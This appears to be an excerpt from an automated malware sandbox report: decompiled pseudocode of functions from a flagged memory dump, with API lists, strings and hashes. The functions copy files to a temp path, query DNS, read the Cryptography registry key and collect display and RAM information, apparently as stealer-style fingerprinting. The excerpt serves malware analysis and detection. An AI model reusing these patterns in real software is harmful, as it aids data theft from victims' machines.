                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E00403980(_v12);
                                                                                                                                                                                          				_push(_t77);
                                                                                                                                                                                          				_push(0x40deaf);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t77;
                                                                                                                                                                                          				_t29 = E00403790(_v16);
                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                          				_t78 = _t63 -  *0x41c82c; // 0x0
                                                                                                                                                                                          				if(_t78 != 0) {
                                                                                                                                                                                          					if(__eflags < 0) {
                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t79 = _t29 -  *0x41c828; // 0x0
                                                                                                                                                                                          					if(_t79 < 0) {
                                                                                                                                                                                          						L4:
                                                                                                                                                                                          						E00407168(_v8, _t59,  &_v16);
                                                                                                                                                                                          						_t40 = E00403790(_v16);
                                                                                                                                                                                          						_t80 = _t40;
                                                                                                                                                                                          						if(_t40 == 0) {
                                                                                                                                                                                          							_t9 =  &_v20; // 0x414c4c
                                                                                                                                                                                          							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
                                                                                                                                                                                          							_t10 =  &_v20; // 0x414c4c
                                                                                                                                                                                          							_t51 = E00403D3C( *_t10);
                                                                                                                                                                                          							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
                                                                                                                                                                                          							_t81 = _t54;
                                                                                                                                                                                          							if(_t54 != 0) {
                                                                                                                                                                                          								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
                                                                                                                                                                                          								E00407168(_v24, _t59,  &_v16);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
                                                                                                                                                                                          						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
                                                                                                                                                                                          						DeleteFileW(E00403D3C(_v28));
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t64);
                                                                                                                                                                                          				 *[fs:eax] = _t64;
                                                                                                                                                                                          				_push(E0040DEB6);
                                                                                                                                                                                          				E00403B98( &_v28, 3);
                                                                                                                                                                                          				E00403508( &_v16, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}


                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AllocCopyDeleteString
                                                                                                                                                                                          • String ID: %TEMP%\curbuf.dat$LLA
                                                                                                                                                                                          • API String ID: 5292005-3909751444
                                                                                                                                                                                          • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                          • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                          				intOrPtr* _t37;
                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                          				intOrPtr* _t46;
                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t16 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t16 =  *_t16 + _t16;
                                                                                                                                                                                          				 *[cs:eax] =  *[cs:eax] + _t16;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t16;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t49);
                                                                                                                                                                                          				_push(0x417f22);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t49 + 0xfffffff4;
                                                                                                                                                                                          				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                          				if(_t46 != 0) {
                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                          					_t37 = E00402530(0x30);
                                                                                                                                                                                          					_v16 = E00402530(0x48);
                                                                                                                                                                                          					 *_t37 = 1;
                                                                                                                                                                                          					 *((intOrPtr*)(_t37 + 4)) = _v12;
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v16);
                                                                                                                                                                                          					_push(_t37);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                          					_push(E00403990(_v8));
                                                                                                                                                                                          					if( *_t46() == 0) {
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t41);
                                                                                                                                                                                          				 *[fs:eax] = _t41;
                                                                                                                                                                                          				_push(E00417F29);
                                                                                                                                                                                          				return E004034E4( &_v8);
                                                                                                                                                                                          			}













                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                          • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                                                                          			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				intOrPtr* _t36;
                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *[cs:eax] =  *[cs:eax] + __eax;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t48);
                                                                                                                                                                                          				_push(0x417f22);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t48 + 0xfffffff4;
                                                                                                                                                                                          				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                          				if(_t45 != 0) {
                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                          					_t36 = E00402530(0x30);
                                                                                                                                                                                          					_v16 = E00402530(0x48);
                                                                                                                                                                                          					 *_t36 = 1;
                                                                                                                                                                                          					 *((intOrPtr*)(_t36 + 4)) = _v12;
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v16);
                                                                                                                                                                                          					_push(_t36);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                          					_push(E00403990(_v8));
                                                                                                                                                                                          					if( *_t45() == 0) {
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t40);
                                                                                                                                                                                          				 *[fs:eax] = _t40;
                                                                                                                                                                                          				_push(E00417F29);
                                                                                                                                                                                          				return E004034E4( &_v8);
                                                                                                                                                                                          			}












                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                          • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                          			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				_Unknown_base(*)()* _v8;
                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                          				char _v336;
                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                          				char _v344;
                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v340 = 0;
                                                                                                                                                                                          				_v344 = 0;
                                                                                                                                                                                          				_t43 = __eax;
                                                                                                                                                                                          				_push(_t46);
                                                                                                                                                                                          				_push(0x41670d);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t46 + 0xfffffeac;
                                                                                                                                                                                          				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
                                                                                                                                                                                          				_v336 = 0x148;
                                                                                                                                                                                          				_t31 = 0;
                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v336);
                                                                                                                                                                                          					_push(_t31);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					if(_v8() == 0) {
                                                                                                                                                                                          						break;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t31 = _t31 + 1;
                                                                                                                                                                                          					_push( *_t43);
                                                                                                                                                                                          					E00403D10( &_v344, 0x80,  &_v268);
                                                                                                                                                                                          					E0040377C( &_v340, _v344);
                                                                                                                                                                                          					_push(_v340);
                                                                                                                                                                                          					_push(E00416744);
                                                                                                                                                                                          					E00403850();
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t39);
                                                                                                                                                                                          				 *[fs:eax] = _t39;
                                                                                                                                                                                          				_push(E00416714);
                                                                                                                                                                                          				E00403B80( &_v344);
                                                                                                                                                                                          				return E004034E4( &_v340);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                                                                                                          • API String ID: 2574300362-1693391355
                                                                                                                                                                                          • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                          • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 29%
                                                                                                                                                                                          			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t46);
                                                                                                                                                                                          				_push(0x417f22);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                                                                                                                          				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                          				if(_t43 != 0) {
                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                          					_t34 = E00402530(0x30);
                                                                                                                                                                                          					_v16 = E00402530(0x48);
                                                                                                                                                                                          					 *_t34 = 1;
                                                                                                                                                                                          					 *((intOrPtr*)(_t34 + 4)) = _v12;
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v16);
                                                                                                                                                                                          					_push(_t34);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                          					_push(E00403990(_v8));
                                                                                                                                                                                          					if( *_t43() == 0) {
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t38);
                                                                                                                                                                                          				 *[fs:eax] = _t38;
                                                                                                                                                                                          				_push(E00417F29);
                                                                                                                                                                                          				return E004034E4( &_v8);
                                                                                                                                                                                          			}











                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                          • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E00401870() {
                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                          				intOrPtr _t20;
                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                          
                                                                                                                                                                                          				_push(_t23);
                                                                                                                                                                                          				_push(E00401926);
                                                                                                                                                                                          				_push( *[fs:edx]);
                                                                                                                                                                                          				 *[fs:edx] = _t23;
                                                                                                                                                                                          				_push(0x41c5b4);
                                                                                                                                                                                          				L004011C4();
                                                                                                                                                                                          				if( *0x41c035 != 0) {
                                                                                                                                                                                          					_push(0x41c5b4);
                                                                                                                                                                                          					L004011CC();
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00401234(0x41c5d4);
                                                                                                                                                                                          				E00401234(0x41c5e4);
                                                                                                                                                                                          				E00401234(0x41c610);
                                                                                                                                                                                          				 *0x41c60c = LocalAlloc(0, 0xff8);
                                                                                                                                                                                          				if( *0x41c60c != 0) {
                                                                                                                                                                                          					_t13 = 3;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_t20 =  *0x41c60c; // 0x0
                                                                                                                                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                                                                                          						_t13 = _t13 + 1;
                                                                                                                                                                                          					} while (_t13 != 0x401);
                                                                                                                                                                                          					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
                                                                                                                                                                                          					 *0x41c5f4 = 0x41c5f4;
                                                                                                                                                                                          					 *0x41c600 = 0x41c5f4;
                                                                                                                                                                                          					 *0x41c5ac = 1;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t19);
                                                                                                                                                                                          				 *[fs:eax] = _t19;
                                                                                                                                                                                          				_push(E0040192D);
                                                                                                                                                                                          				if( *0x41c035 != 0) {
                                                                                                                                                                                          					_push(0x41c5b4);
                                                                                                                                                                                          					L004011D4();
                                                                                                                                                                                          					return 0;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return 0;
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 730355536-0
                                                                                                                                                                                          • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                          • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E0040246C(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t45 = _t47;
                                                                                                                                                                                          				_t42 = __edx;
                                                                                                                                                                                          				_t25 = __eax;
                                                                                                                                                                                          				if( *0x41c5ac != 0 || E00401870() != 0) {
                                                                                                                                                                                          					_push(_t45);
                                                                                                                                                                                          					_push("�^");
                                                                                                                                                                                          					_push( *[fs:edx]);
                                                                                                                                                                                          					 *[fs:edx] = _t47;
                                                                                                                                                                                          					if( *0x41c035 != 0) {
                                                                                                                                                                                          						_push(0x41c5b4);
                                                                                                                                                                                          						L004011CC();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if(E00402290(_t25, _t42) == 0) {
                                                                                                                                                                                          						_t39 = E00401F5C(_t42);
                                                                                                                                                                                          						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
                                                                                                                                                                                          						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
                                                                                                                                                                                          							_t15 = _t42;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if(_t39 != 0) {
                                                                                                                                                                                          							E00402628(_t25, _t15, _t39);
                                                                                                                                                                                          							E004020EC(_t25);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_v8 = _t39;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_v8 = _t25;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_pop(_t36);
                                                                                                                                                                                          					 *[fs:eax] = _t36;
                                                                                                                                                                                          					_push(E00402524);
                                                                                                                                                                                          					if( *0x41c035 != 0) {
                                                                                                                                                                                          						_push(0x41c5b4);
                                                                                                                                                                                          						L004011D4();
                                                                                                                                                                                          						return 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					return 0;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}













                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                                                                                                                                            • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                            • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                            • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                            • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                          • String ID: ^
                                                                                                                                                                                          • API String ID: 2227675388-551292248
                                                                                                                                                                                          • Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                                                                                                                                                                                          • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%